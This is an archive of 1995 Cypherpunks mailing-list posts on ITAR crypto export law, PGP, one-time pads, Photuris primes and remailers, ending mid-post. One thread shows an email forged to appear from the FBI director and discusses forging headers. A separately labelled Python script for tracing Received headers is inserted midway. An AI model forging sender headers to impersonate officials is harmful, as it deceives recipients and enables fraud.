American Civil Liberties Union * American Communication Association * American Council for the Arts * Arts & Technology Society * Association of Alternative Newsweeklies * biancaTroll productions * Boston Coalition for Freedom of Expression * Californians Against Censorship Together * Center For Democracy And Technology * Centre for Democratic Communications * Center for Public Representation * Citizen's Voice - New Zealand * Cloud 9 Internet * Computer Communicators Association * Computel Network Services * Computer Professionals for Social Responsibility * Cross Connection * Cyber-Rights Campaign * CyberQueer Lounge * Dutch Digital Citizens' Movement * ECHO Communications Group, Inc.
* Electronic Frontier Canada * Electronic Frontier Foundation * Electronic Frontier Foundation - Austin * Electronic Frontiers Australia * Electronic Frontiers Houston * Electronic Frontiers New Hampshire * Electronic Privacy Information Center * Feminists For Free Expression * First Amendment Teach-In * Florida Coalition Against Censorship * FranceCom, Inc. Web Advertising Services * Friendly Anti-Censorship Taskforce for Students * Hands Off! The Net * Inland Book Company * Inner Circle Technologies, Inc. * Inst. for Global Communications * Internet On-Ramp, Inc. * Internet Users Consortium * Joint Artists' and Music Promotions Political Action Committee * The Libertarian Party * Marijuana Policy Project * Metropolitan Data Networks Ltd. * MindVox * MN Grassroots Party * National Bicycle Greenway * National Campaign for Freedom of Expression * National Coalition Against Censorship * National Gay and Lesbian Task Force * National Public Telecomputing Network * National Writers Union * Oregon Coast RISC * Panix Public Access Internet * People for the American Way * Republican Liberty Caucus * Rock Out Censorship * Society for Electronic Access * The Thing International BBS Network * The WELL * Voters Telecommunications Watch

(Note: All 'Electronic Frontier' organizations are independent entities, not EFF chapters or divisions.)

________________________________________________________________________
End Alert
========================================================================

From acceso2 at diatel.upm.es Tue Nov 7 06:43:47 1995
From: acceso2 at diatel.upm.es (Usuario Acceso2)
Date: Tue, 7 Nov 1995 22:43:47 +0800
Subject: Wich pgp is stronger?
Message-ID: <222*/S=acceso2/OU=diatel/O=upm/PRMD=iris/ADMD=mensatex/C=es/@MHS>

Hi C'punks:

Which pgp is supposed to be stronger, 2.6.2 or 2.6.2 i? What exactly are the differences between them?

Thanks,
Jaime

From junger at pdj2-ra.F-REMOTE.CWRU.Edu Tue Nov 7 07:07:20 1995
From: junger at pdj2-ra.F-REMOTE.CWRU.Edu (Peter D. Junger)
Date: Tue, 7 Nov 1995 23:07:20 +0800
Subject: Exporting software doesn't mean exporting
In-Reply-To:
Message-ID:

Oliver Huf writes:
:
:
: On Tue, 7 Nov 1995, Peter D. Junger wrote:
:
: > From Section 120.17 of the ITAR which provides:
: >
: > _Export_ means:
: > . . . .
: > (4) Disclosing (including oral or visual disclosure) or transferring
: > technical data to a foreign person, whether in the United States or
: > abroad . . . .
:
: The ITAR is U.S.-Law. This only applies (by definition) to US-citizens
: or persons in the U.S.!

Go tell that to General Noriega. I don't know what definition you are talking about, but it is not one recognized by the American Courts.

: I think it's a common mistake of many Americans that they believe
: creating law means creating law for the whole world!

: > Go read the section that I quoted again. Where is there an exception
: > for foreign persons who happen to be abroad?

: It's inherent. You simply can't apply US-law to non-US-citizens outside
: the U.S.!

The American courts will apply American laws to non-US-citizens who violate American laws outside the United States, if they can catch them. The fact that they may be in the United States because they were kidnapped or because they were captured outside the United States in an aggressive war that quite clearly violated international law won't stop them for a moment. And lord help the foreigner who has violated US law outside the US and then tries to immigrate to the United States.

And the United States is not alone in this. Look what Israel did to Eichmann. And didn't Denmark just allow Germany to extradite an American citizen for nasty things that he wrote and said in the United States?

--
Peter D. Junger--Case Western Reserve University Law School--Cleveland, OH
Internet: junger at pdj2-ra.f-remote.cwru.edu junger at samsara.law.cwru.edu

From asgaard at sos.sll.se Tue Nov 7 07:30:52 1995
From: asgaard at sos.sll.se (Mats Bergstrom)
Date: Tue, 7 Nov 1995 23:30:52 +0800
Subject: Exporting software doesn't mean exporting
In-Reply-To:
Message-ID:

On Tue, 7 Nov 1995, Oliver Huf wrote:

> It's inherent. You simply can't apply US-law to non-US-citizens outside
> the U.S.!

Well, also (?) the Exxon bill tries to do just that. If you put up 'indecent' material at your .de site that persons in the US can ftp or browse or whatever, and the Exxon bill passes, you can be sentenced to (at least) 2 years jail in the US. Presumably, since they don't think you are as important as the infamous ex Panama president, they won't come and get you, but might meet you at the airport if you ever plan to visit the US. (They will not try to get you sentenced in a German court since you haven't committed any crime in Germany, and the German Government will probably not extradite you - I'm not familiar with German extradition laws, though.)

With only one military superpower left we can expect its jurisdiction to expand as it sees fit.

Mats

From bsimpson at morningstar.com Tue Nov 7 07:31:52 1995
From: bsimpson at morningstar.com (William Allen Simpson)
Date: Tue, 7 Nov 1995 23:31:52 +0800
Subject: Photuris Primality verification needed
Message-ID: <1999.bsimpson@morningstar.com>

> From: "Brian A. LaMacchia"
> > Recently, someone asked for a smaller prime of only 512-bits for speed.
> > This is more than enough for the strength of keys needed for DES, 3DES,
> > MD5 and SHA. Perhaps this would be easier to have more complete and
> > robust verification as well.
>
> Our practical experiences with discrete logs suggests that the effort
> required to perform the discrete log precomputations in (a) is slightly
> more difficult than factoring a composite of the same size in bits. In
> 1990-91 we estimated that performing (a) for a k-bit prime modulus was
> about as hard as factoring a k+32-bit composite. [Recent factoring work
> has probably changed this a bit, but it's still a good estimate.]
>

Thanks. I have added the [from Schneier] estimate

    e ** ((ln p)**(1/2) * (ln (ln p))**(1/2))

and number field sieve estimate

    e ** ((ln p)**(1/3) * (ln (ln p))**(2/3))

to the Photuris draft, with a small amount of explanation.

Hilarie Orman posted that 512-bits only gives an order of 56-bits strength, 1024-bits yields 80-bits strength, and 2048 yields 112-bits strength. I do not have the facilities to verify her numbers.

As most of us agree that 56-bits is not enough (DES), the 512-bit prime seems a waste of time and a tempting target. I'd like to drop it, but Phil is inclined to keep it with a disclaimer.

Bill.Simpson at um.cc.umich.edu
Key fingerprint = 2E 07 23 03 C5 62 70 D3 59 B1 4F 5E 1D C2 C1 A2

From bsimpson at morningstar.com Tue Nov 7 07:33:13 1995
From: bsimpson at morningstar.com (William Allen Simpson)
Date: Tue, 7 Nov 1995 23:33:13 +0800
Subject: Photuris Primality verification needed
Message-ID: <1997.bsimpson@morningstar.com>

I wish to roundly thank all those that responded to our need for verification. We had several excellent responses.

The primes have now been better verified using Miller-Rabin with different platforms, and with separately coded math libraries. More exhaustive testing is ongoing.

Thanks are due to Wei Dai and Frank A Stevenson, as well as independent math libraries by Rich Schroeppel and Eric Young.

Bill.Simpson at um.cc.umich.edu
Key fingerprint = 2E 07 23 03 C5 62 70 D3 59 B1 4F 5E 1D C2 C1 A2

From froomkin at law.miami.edu Tue Nov 7 07:46:19 1995
From: froomkin at law.miami.edu (Michael Froomkin)
Date: Tue, 7 Nov 1995 23:46:19 +0800
Subject: Exporting software doesn't mean exporting (was: Re: lp ?)
In-Reply-To:
Message-ID:

I am delighted to discover that there is a person in this world who reads the ITAR more broadly than I do. I can see how the ITAR could be read to reach a Frenchman who sends crypto via email to a German that happens, through no fault of his own, to be routed via New York; we might have to talk about whether the scienter requirement would mean that M. Frenchman knew or should have known about the routing. [NB "could be read" does not equal "should be read".]

Not even I, however, would imagine that any court anywhere, could read the ITAR or the legislation authorizing it (which is more to the point) as reaching two foreigners talking abroad, neither of whom is a US person. Not only does the US lack the jurisdiction to make such a rule, it has never sought to make such a rule in any context I am aware of (no, foreign wars don't count). Not even in anti-trust or securities, where the extraterritorial jurisdictional assertions are premised on the effects of the foreign act to the US market...

A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law |
U. Miami School of Law     | froomkin at law.miami.edu
P.O. Box 248087            | http://www.law.miami.edu/~froomkin
Coral Gables, FL 33124 USA | It's warm here.

From jya at pipeline.com Tue Nov 7 08:02:39 1995
From: jya at pipeline.com (John Young)
Date: Wed, 8 Nov 1995 00:02:39 +0800
Subject: NOT_nok
Message-ID: <199511071547.KAA25224@pipe2.nyc.pipeline.com>

11-7-95. W$J, Page One lead:

"The 'Intranet'. Internet Software Poses Big Threat to Notes, IBM's Stake in Lotus."

Hundreds of firms are achieving similar groupware linkups with simpler, cheaper systems on the World Wide Web. Dubbed "Intranets," these private networks combine text, graphics and even video to distribute news, answer employee questions, update personnel records and connect far-flung workers. The Intranets link a total of about 15 million workers.
These private networks are far different from what most Internet fans see -- the public "home pages." These setups reside on company-controlled servers shielded from the public Web by a security "firewall." The Web has an "open" design that all programming developers can use in common, as opposed to the "closed" and proprietary designs of Lotus Notes, Novell's Groupwise and Microsoft's Exchange. That lets Intranets accept traffic from incompatible computers more readily, making it easier for customers and suppliers to tap in, and for users to draw data from old mainframes and minicomputers.

NOT_nok (10 kb)

From perry at piermont.com Tue Nov 7 08:13:07 1995
From: perry at piermont.com (Perry E. Metzger)
Date: Wed, 8 Nov 1995 00:13:07 +0800
Subject: Exporting software doesn't mean exporting (was: Re: lp ?)
In-Reply-To: <9511070433.AA11349@zorch.w3.org>
Message-ID: <199511071551.KAA16700@jekyll.piermont.com>

hallam at w3.org writes:
>
> >Were that the case, citizens couldn't sue to have provisions impacting
> >them enforced, but the fact of the matter is that they can.
>
> Various treaties provide that various privileges will be granted to
> various citizens of the countries concerned. Do the treaties grant
> such privileges in this case? Just because there is a treaty on
> nuclear disarmament between the US and the USSR does not mean that
> you as a private citizen can press for enforcement through the
> courts if you think that the USSR is not performing.

No, but treaties permitting citizens of Canada to work in the U.S. are enforceable in U.S. courts, and other similar treaties that have personal impact are enforceable in court, such as tax treaties. In the case of a treaty saying "you aren't breaking a third country's laws if you transmit something that wouldn't be legal to say in that country over its telecom lines", it's a personal rather than a national impact and it could be enforced in a U.S. court.

> >> Perry's somewhat offensive language is not a substitute for an argument.
>
> >Thank you for the ad hominem.
>
> Perry used the phrase "lobotomized mongoloid judge" I think that this
> type of language is offensive and unnecessary.

To whom was I being offensive, Mr. Hallam, given that I was referring to a theoretical non-extant personage? Or are you a charter member of "lobotomized mongoloids for equal justice" or some such.

> Ad hominem is a perfectly valid form of argument where one is considering
> the reputation of the person making the statement.

Yes, but my reputation is irrelevant to whether or not you can be prosecuted as a foreigner for the act of handing another foreigner cryptographic software outside the U.S.

Perry

From pkoning at chipcom.com Tue Nov 7 09:32:15 1995
From: pkoning at chipcom.com (Paul Koning 1695)
Date: Wed, 8 Nov 1995 01:32:15 +0800
Subject: using pgp to make an otp
Message-ID: <309FBAB3@mailer2>

Will it ever sink in that NO algorithm produces a "random" bitstring, and therefore NO algorithm can be the driver of a one time pad?

The output of an algorithm is (at best) PSEUDOrandom. While a stream cypher constructed that way may be strong, it is NOT a one time pad and does NOT share with one time pad the unique property of being absolutely unbreakable from first principles.

(It may very well have the property that it is too hard to break in practice -- if so it makes a useful cryptosystem. But to call such a thing "OTP" indicates a fundamental misunderstanding.)

See the sci.crypt FAQ for more details.

paul

----------
From: owner-cypherpunks
To: Adam Shostack
Cc: Alan.Pugh; cypherpunks
Subject: Re: using pgp to make an otp
Date: Monday, November 06, 1995 11:31PM

> PGP output is not random enough to be used for a one time pad.
> The security of a OTP is *entirely* based on the quality of the random
> numbers; they should come from some strong generator. Building good
> one time pads is tough, and usually not worth the effort.

No, however the output of "pgp +makerandom=XXX filename.dat" _IS_ random enough for an OTP. The problem then becomes distributing this data.

-derek

From junger at pdj2-ra.F-REMOTE.CWRU.Edu Tue Nov 7 09:32:58 1995
From: junger at pdj2-ra.F-REMOTE.CWRU.Edu (Peter D. Junger)
Date: Wed, 8 Nov 1995 01:32:58 +0800
Subject: Exporting software doesn't mean exporting (was: Re: lp ?)
In-Reply-To:
Message-ID:

Michael Froomkin writes:

: I am delighted to discover that there is a person in this world who reads
: the ITAR more broadly than I do. I can see how the ITAR could be read to
: reach a Frenchman who sends crypto via email to a German that happens,
: through no fault of his own, to be routed via New York; we might have to
: talk about whether the scienter requirement would mean that M. Frenchman
: knew or should have known about the routing. [NB "could be read" does
: not equal "should be read".]
:
: Not even I, however, would imagine that any court anywhere, could read
: the ITAR or the legislation authorizing it (which is more to the point)
: as reaching two foreigners talking abroad, neither of whom is a US person.

I quite agree that no one can read the Arms Control Export Act as authorizing the definition of export in the ITAR that requires, among other things, that a foreign person get a license that the ACEA says that he can't get, before disclosing cryptographic software to another foreign person ``in the United States or abroad''.

The ITAR violates not only the first amendment to the United States Constitution, it also violates the separation of powers doctrine. But it still says what it says. (And that is why it is unconstitutional.)

--
Peter D. Junger--Case Western Reserve University Law School--Cleveland, OH
Internet: junger at pdj2-ra.f-remote.cwru.edu junger at samsara.law.cwru.edu

From froomkin at law.miami.edu Tue Nov 7 09:40:48 1995
From: froomkin at law.miami.edu (Michael Froomkin)
Date: Wed, 8 Nov 1995 01:40:48 +0800
Subject: Exporting software doesn't mean exporting (was: Re: lp ?)
In-Reply-To:
Message-ID:

On Tue, 7 Nov 1995, Peter D. Junger wrote:

> I quite agree that no one can read the Arms Control Export Act as
>authorizing the definition of export in the ITAR that requires, among
>other things, that a foreign person get a license that the ACEA says
>that he can't get, before disclosing cryptographic software to another
>foreign person ``in the United States or abroad''.
>
> The ITAR violates not only the first amendment to the United States
> Constitution, it also violates the separation of powers doctrine. But
> it still says what it says. (And that is why it is unconstitutional.)
>

[Note that this small disagreement between PDJ and me should not obscure our larger areas of agreement...]

To reiterate my point in legalese: any court construing the ACEA would inevitably read the prohibition on "exporting" to a foreign person as not applying where the nation lacks jurisdiction. This is not even a case of applying a construction to save the constitutionality of the statute (since it could well take a narrower construction to do that). It's just common sense, which courts actually resort to on occasion.

In short, in this particular case the ACEA, and by extension the ITAR, doesn't "say what it says" it "says what it must mean". This is an important way in which legal parsing differs from compiling...

,,,,,

I'd be interested in hearing more about why you say the ITAR violates separation of powers: because it gives the executive branch too much power to define the elements of a criminal offense?

A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law |
U. Miami School of Law     | froomkin at law.miami.edu
P.O. Box 248087            | http://www.law.miami.edu/~froomkin
Coral Gables, FL 33124 USA | It's warm here.

From tien at well.com Tue Nov 7 09:45:26 1995
From: tien at well.com (Lee Tien)
Date: Wed, 8 Nov 1995 01:45:26 +0800
Subject: forging headers (with more header information)
Message-ID: <199511071708.JAA25692@well.com>

My apologies. I followed Tim's advice and turned on verbose headers, and this is what I got.

Lee

Return-Path: freeh at fbi.gov
Received: from nimitz.MIT.EDU (NIMITZ.MIT.EDU [18.80.0.161]) by well.com (8.6.12/8.6.12) with SMTP id NAA20123 for ; Tue, 24 Oct 1995 13:06:23 -0700
From: freeh at fbi.gov
Message-Id: <199510242006.NAA20123 at well.com>
Received: from sgigate.SGI.COM by nimitz.MIT.EDU with SMTP (1.37.109.4/16.2) id AA00301; Tue, 24 Oct 95 16:07:08 -0400
Date: Tue, 24 Oct 95 16:07:08 -0400
Apparently-To: tien at well.sf.ca.us
X-UIDL: 814570964.056

> How difficult is it to forge headers? How difficult is it to trace a
> message to the actual sender if the header is forged?

Not very difficult at all (to forge, that is). This is a quick and dirty example that should be somewhat traceable. If you want pointers on how to trace it, post the whole thing, including headers, to cypherpunks.

Louis

From gnu at toad.com Wed Nov 8 01:54:48 1995
From: gnu at toad.com (John Gilmore)
Date: Wed, 8 Nov 95 01:54:48 PST
Subject: Call For Papers - Conference on Redistributable Software
Message-ID: <9511080954.AA13883@toad.com>

[I'm hoping that we can get some papers on freely redistributable *crypto* and *security* software -- like PGP or PEM or SSL_eay or Kerberos or brute-force tools or SATAN or Java tools or whatever! I'm on the program committee and am trying to make the conference as broad as possible, not just focusing on "traditional" free software. Help!
--gnu]

CALL FOR PAPERS

First Conference on Freely Redistributable Software
Sponsored by the Free Software Foundation
2-5 February 1996
Cambridge, MA

Over the past 15 years, free and low-cost software has become ubiquitous. This conference will bring together implementors of several different types of freely redistributable software and publishers of such software (on various media). There will be tutorials and refereed papers, as well as keynotes by Linus Torvalds and Richard Stallman.

The Conference will be held at the Cambridge Center Marriott, 2-5 February 1996.

Papers are invited on any aspect of GNU, Linux, NetBSD, 386BSD, FreeBSD, expect, PERL, tcl/tk, and other tools for which the code is accessible and redistributable.

Extended abstracts are due on or before Thursday, 30 November 1995. Authors will be notified no later than 8 December. Full papers will be due Thursday, 4 January 1996.

Program committee:
    Peter H. Salus, chair
    Robert J. Chassell
    Chris Demetriou
    John Gilmore
    Marshall Kirk McKusick
    Rich Morin
    Eric S. Raymond
    Vernor Vinge

Abstracts of 350-750 words (in troff, PostScript, or straight ASCII, only) should be sent to conf96 at gnu.ai.mit.edu

--
-----------------------------------------------------------
Peter H. Salus #3303 4 Longfellow Place Boston, MA 02114
+1 617 723 3092
-----------------------------------------------------------

From cjs at netcom.com Tue Nov 7 10:04:48 1995
From: cjs at netcom.com (cjs)
Date: Wed, 8 Nov 1995 02:04:48 +0800
Subject: Sign my own certificates?
Message-ID: <199511071736.JAA29605@netcom20.netcom.com>

Oh jesus, I need to get myself a certificate for the netscape servers at work. All I need are three forms of identification, two written letters, an authorized signature, $300, mailed and faxed, along with an e-mail or two.

I think this is an amazing pain in the ass. Any way I could sign a certificate by myself for myself and have it work with the netscape products?

Just curious,
Christopher

From perry at piermont.com Tue Nov 7 10:17:32 1995
From: perry at piermont.com (Perry E. Metzger)
Date: Wed, 8 Nov 1995 02:17:32 +0800
Subject: Exporting software doesn't mean exporting (was: Re: lp ?)
In-Reply-To:
Message-ID: <199511071753.MAA00375@jekyll.piermont.com>

"Peter D. Junger" writes:
> : Where the hell did you get that idea? [that the ITAR applies to
> : foreigners abroad].
>
> From Section 120.17 of the ITAR which provides:
>
> _Export_ means:
>
> . . . .
>
> (4) Disclosing (including oral or visual disclosure) or transferring
> technical data to a foreign person, whether in the United States or
> abroad . . . .

That can't possibly be considered under U.S. law to apply to foreigners talking to foreigners abroad, and if you are really a lawyer you should know that the mere fact that the law doesn't mention its jurisdiction doesn't make it unlimited.

The statutes of New York State say that I can be prosecuted for running a red light. Nowhere at all do they say that the red light must be in New York State, but I suspect that it would be completely impossible for the NY State attorney general to get any court, in New York State or elsewhere, to hear a case that I violated New York law by running a light in Turkmenistan.

> Go read the section that I quoted again. Where is there an exception
> for foreign persons who happen to be abroad?

Do you actually call yourself a lawyer? You appear to be ignorant of the most basic facts of our legal system -- knowledge that I, as a complete layman, am completely comfortable with. I wouldn't pretend to be able to practice law, but even I can smell utterly insane readings of the regulations.

Perry

From perry at piermont.com Tue Nov 7 10:32:33 1995
From: perry at piermont.com (Perry E. Metzger)
Date: Wed, 8 Nov 1995 02:32:33 +0800
Subject: Photuris Primality verification needed
In-Reply-To: <1999.bsimpson@morningstar.com>
Message-ID: <199511071803.NAA00410@jekyll.piermont.com>

"William Allen Simpson" writes:
> As most of us agree that 56-bits is not enough (DES), the 512-bit prime
> seems a waste of time and a tempting target. I'd like to drop it, but
> Phil is inclined to keep it with a disclaimer.

I agree with your approach, Bill -- it seems worth dropping. Something this dangerous isn't worth leaving around for people to accidentally use.

Perry

From dsmith at cdale1.midwest.net Tue Nov 7 10:46:32 1995
From: dsmith at cdale1.midwest.net (David E. Smith)
Date: Wed, 8 Nov 1995 02:46:32 +0800
Subject: forging headers (with more header information)
Message-ID: <43796.dsmith@[204.248.40.2]>

On Tue, 7 Nov 1995 09:08:39 -0800, Lee Tien wrote:

>Return-Path: freeh at fbi.gov
>Received: from nimitz.MIT.EDU (NIMITZ.MIT.EDU [18.80.0.161]) by well.com
>(8.6.12/8.6.12) with SMTP id NAA20123 for ; Tue, 24 Oct
>1995 13:06:23 -0700
>From: freeh at fbi.gov
>Message-Id: <199510242006.NAA20123 at well.com>
>Received: from sgigate.SGI.COM by nimitz.MIT.EDU with SMTP
> (1.37.109.4/16.2) id AA00301; Tue, 24 Oct 95 16:07:08 -0400
>Date: Tue, 24 Oct 95 16:07:08 -0400
>Apparently-To: tien at well.sf.ca.us
>X-UIDL: 814570964.056

Without having any access to anything but the headers, it looks like you are an employee for SGI and sent the message from there. Look at the last Received: header. It went from sgi.com to mit.edu to well.com and then to you.

Dave

-----
David E. Smith, c/o Southeast Missouri State University
1210 Towers South, Cape Girardeau MO USA 63701-4745
+1(314)339-3814, "dsmith at midwest.net", PGP ID 0x92732139
http://www.midwest.net/scribers/dsmith/

From perry at piermont.com Tue Nov 7 12:05:36 1995
From: perry at piermont.com (Perry E. Metzger)
Date: Wed, 8 Nov 1995 04:05:36 +0800
Subject: Exporting software doesn't mean exporting (was: Re: lp ?)
In-Reply-To: <199511071907.VAA01462@grumble.grondar.za>
Message-ID: <199511071918.OAA05283@jekyll.piermont.com>

Mark Murray writes:
> Hmm. Not only is this law unenforceable, it is unenforced. Anyone,
> non-US or otherwise can buy crypto books - you just can't get the code
> on floppy. Bruce Schneier went through this procedure when he CJ'ed
> "Applied Cryptography".

To my knowledge, Bruce Schneier never CJ'ed "Applied Cryptography". Phil Karn did that.

Perry

From froomkin at law.miami.edu Tue Nov 7 12:24:27 1995
From: froomkin at law.miami.edu (Michael Froomkin)
Date: Wed, 8 Nov 1995 04:24:27 +0800
Subject: Exporting software doesn't mean exporting (was: Re: lp ?)
In-Reply-To:
Message-ID:

[much trimmed in various places]

On Tue, 7 Nov 1995, Peter D. Junger wrote:

> Michael Froomkin writes:
> : To reiterate my point in legalese: any court construing the ACEA would
> : inevitably read the prohibition on "exporting" to a foreign person as not
> : applying where the nation lacks jurisdiction. This is not even a case of
> : applying a construction to save the constitutionality of the statute
> : (since it could well take a narrower construction to do that). It's just
> : common sense, which courts actually resort to on occasion.
> I would admit that a court might do this in an effort to hold the
> statute constitutional, but a court might also hold the regulations
> unconstitutional because they are overbroad. Remember, the first

Technically, this is holding the regulations ultra vires, not unconstitutional; the difference matters.

> amendment is the one area where one has standing to raise facial
> constitutional claims even though one's own constitutional rights are
> not infringed. Consider the case where a foreigner in the United
> States discloses to another foreigner, and is then prosecuted.
> Couldn't he raise the point in his defense?
>

Note the change in fact pattern: now both foreigners are IN the US where indeed they are subject to US law.
My bet: the court has no trouble applying the ITAR to these facts and convicting. I agree this is a little silly; but not silly enough to stop it. [The government will argue, and win, as follows: suppose there is no law against murder in either of the nations they come from. Does that mean they can kill each other here?]

> (But of course the ITAR as applied to cryptographic software--and that
> is all that I am talking about--are so unconstitutional in so many
> different ways that nothing is going to turn on that one issue.)

This issue is now in front of two district judges.

> But the real problem--to the extent that there is a real problem--is a
> more practical one. What happens when some foreign person who has set
> up a large on-line archive of cryptographic software, in part just to
> twit the Americans, tries to immigrate to the United States? If he is
> excluded because he violated the export control laws, is he even going
> to get a court hearing? And if by some miracle he does get a court

Won't need it. He has committed no offense. If his petition is turned down, he has a right of action.

> hearing, isn't the government going to (i) argue that he was
> conspiring with some Americans--which would make him indistinguishable

Without evidence, they will lose. Even with evidence, not obvious he has done anything wrong.

> from Noriega--and (ii) argue that he has to be covered, because one cannot
> distinguish his case from that of a foreign person who disclosed
> cryptographic software within the United States to another foreign
> person. (Remember, the regulation says ``within the United States or
> abroad''?)

They lose. You distinguish it easily ("Now where exactly was the defendant at the time, Mr. US Atty? Germany? Case dismissed.")

> : I'd be interested in hearing more about why you say the ITAR violates
> : separation of powers: because it gives the executive branch too much power
> : to define the elements of a criminal offense?
>
>
> Not that.
My point most simply is that the AECA does not say what the
> ITAR says, and that that is why the language of the ITAR violates the
> doctrine of separation of powers. Your argument--as I understand

Ah. Terminological confusion. That's not a constitutional violation. It's an agency misconstruing a statute, rendering the regulations invalid. See the Administrative Procedures Act....

> it--is that the courts will not construe the ACEA as authorizing the
> weird and unconstitutional definitions in the ITAR. My point is that
> the ACEA doesn't authorize the ITAR and that therefore the ITAR is
> unenforceable on separation of powers grounds.
>
> I wrote an article about this twenty-five years ago arguing that the
> Pentagon Papers case can best be explained as a separation of powers
> case. In the opinions in that case, Near v. Minnesota was the most
> cited case, but Youngstown Sheet and Tube v. Sawyer came in a close
> second. My conclusion was that when a court is confronted with a hard
> constitutional issue, the better part of valor is to decide the case on
> separation of powers grounds, if possible. In Pentagon Papers there was

It's too far off topic to pursue any further, but I must take exception to the suggestion that we are well served by separation of powers intruding into other legal domains. Bowsher tells us that causation principles go out the window in SOP cases. That alone makes it radioactive.

> no congressional authority for the injunction sought; in the case of the
> ITAR there is no congressional authority for the definition of export as
> it applies to software (as opposed to hardware).

A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law |
U. Miami School of Law     | froomkin at law.miami.edu
P.O. Box 248087            | http://www.law.miami.edu/~froomkin
Coral Gables, FL 33124 USA | It's warm here.
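
The Received-header reading in David E. Smith's "forging headers" message earlier in this digest (sgi.com to mit.edu to well.com), as an added example that is not part of any post in the archive. The sample headers are constructed from the quoted ones (the elided recipient clause is dropped), and the function names and the two-label `org_domain` shortcut are assumptions made for illustration.

```python
import re
from email import message_from_string
from email.utils import parseaddr

# Constructed sample: the headers quoted in the post, with the elided
# "for" recipient clause dropped and addresses written with "@".
SAMPLE = """\
Return-Path: <freeh@fbi.gov>
Received: from nimitz.MIT.EDU (NIMITZ.MIT.EDU [18.80.0.161]) by well.com
 (8.6.12/8.6.12) with SMTP id NAA20123; Tue, 24 Oct 1995 13:06:23 -0700
From: freeh@fbi.gov
Message-Id: <199510242006.NAA20123@well.com>
Received: from sgigate.SGI.COM by nimitz.MIT.EDU with SMTP
 (1.37.109.4/16.2) id AA00301; Tue, 24 Oct 95 16:07:08 -0400
Date: Tue, 24 Oct 95 16:07:08 -0400

(body omitted)
"""

# "from <claimed name> [(what the receiver saw)] by <receiving host>"
HOP_RE = re.compile(
    r"\bfrom\s+(?P<src>[^\s;]+)(?:\s+\((?P<seen>[^)]*)\))?\s+by\s+(?P<dst>[^\s;]+)",
    re.IGNORECASE,
)


def org_domain(host):
    """Naive organisational domain: the last two labels, lower-cased."""
    return ".".join(host.strip(".").lower().split(".")[-2:])


def trace_hops(raw):
    """Return the relay hops oldest-first as dicts with src, dst and seen."""
    msg = message_from_string(raw)
    hops = []
    # Every relay prepends its own Received: line, so the last one in the
    # message is the oldest hop.
    for value in reversed(msg.get_all("Received", [])):
        flat = " ".join(value.split())  # undo header folding
        m = HOP_RE.search(flat)
        if m:
            hops.append({"src": m["src"], "dst": m["dst"], "seen": m["seen"]})
        else:
            hops.append({"src": None, "dst": None, "seen": None})
    return hops


def analyze(raw):
    """Rebuild the relay path and compare its entry point with From:."""
    msg = message_from_string(raw)
    hops = trace_hops(raw)
    parsed = [h for h in hops if h["src"]]
    path = [parsed[0]["src"]] + [h["dst"] for h in parsed] if parsed else []
    # A hop whose sender is not the previous hop's receiver means a line is
    # missing, reordered or made up.
    breaks = [
        (a["dst"], b["src"])
        for a, b in zip(parsed, parsed[1:])
        if a["dst"].lower() != b["src"].lower()
    ]
    sender = parseaddr(msg.get("From", ""))[1]
    from_domain = org_domain(sender.rpartition("@")[2])
    entry_domain = org_domain(path[0]) if path else ""
    # Caveat: only lines added by relays you trust are evidence. Anything
    # older than the first trusted relay was supplied by the sending side.
    return {
        "path": path,
        "breaks": breaks,
        "unparsed": len(hops) - len(parsed),
        "from_domain": from_domain,
        "entry_domain": entry_domain,
        "origin_mismatch": bool(path) and from_domain != entry_domain,
    }


if __name__ == "__main__":
    report = analyze(SAMPLE)
    print(" -> ".join(report["path"]))
    print("From: domain", report["from_domain"],
          "vs entry point", report["entry_domain"],
          "mismatch:", report["origin_mismatch"])
```

The `seen` field is what the receiving relay itself recorded about its peer (here the reverse name and IP that well.com logged for nimitz), which is worth more than the name the peer announced.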
From mark at grondar.za Tue Nov 7 12:37:15 1995
From: mark at grondar.za (Mark Murray)
Date: Wed, 8 Nov 1995 04:37:15 +0800
Subject: Exporting software doesn't mean exporting (was: Re: lp ?)
Message-ID: <199511071907.VAA01462@grumble.grondar.za>

>
> "Peter D. Junger" writes:
> > : Where the hell did you get that idea? [that the ITAR applies to
> > : foreigners abroad].
> >
> > From Section 120.17 of the ITAR which provides:
> >
> > _Export_ means:
> >
> > . . . .
> >
> > (4) Disclosing (including oral or visual disclosure) or transferring
> > technical data to a foreign person, whether in the United States or
> > abroad . . . .

Hmm. Not only is this law unenforceable, it is unenforced. Anyone, non-US or otherwise can buy crypto books - you just can't get the code on floppy. Bruce Schneier went through this procedure when he CJ'ed "Applied Cryptography".

\begin{lighter_note}
The illegal bit about (for instance) the munitions T-shirt is that it has a bar code. _This_ makes it illegal for export, because not only is it machine washable, it is machine readable.
\end{lighter_note}

Academic exchange of mathematical knowledge has never been under scrutiny. "Technical data" will have to be interpreted to mean something different, like details of the inner workings of military encryption equipment and the like.

M
--
Mark Murray
46 Harvey Rd, Claremont, Cape Town 7700, South Africa
+27 21 61-3768 GMT+0200
Finger mark at grumble.grondar.za for PGP key

From cardtris at umich.edu Tue Nov 7 12:40:34 1995
From: cardtris at umich.edu (Jennifer Mansfield-Jones)
Date: Wed, 8 Nov 1995 04:40:34 +0800
Subject: encrypt-key remailers
Message-ID:

-----BEGIN PGP SIGNED MESSAGE-----

Hello, all -- I've a semi-clueless question for the gurus here. I'm trying to use the Encrypt-Key option on some of the mixmaster (type I) cypherpunks remailers, and running into trouble.
Please pardon the level of gory detail here; I'm at a loss to see what I'm missing, so I present a verbatim record of what I have tried so far.

Consider the sample remailing directions below. The remailer-help documents include very similar examples. The single-space indenting is only to indicate where files are included, and avoid complaints from pgp-aware mail handlers.

 ::
 Encrypt-Key: apasswd
 Request-Remailing-To: cardtris at umich.edu
 Subject: reply-block-test
 **

The above gets encrypted with flame's public key, yielding a normal little PGP message. The block gets

 ::
 Encrypted: PGP

Prepended onto it, and the result looks like:

 ::
 Encrypted: PGP
 -----BEGIN PGP MESSAGE-----
 Version: 2.6.2

 hIwDQyA95PVgp+UBA/4/Vm0EMi2BYBCioaLe35qx1rOxQVGEYoulmwjdDtFsXTup
 L08nyycNVIdxIAW5O+0T4kVuV3/ycAd84SmxDAls9n5Ebc6vP+gwE+dWCaY1TNok
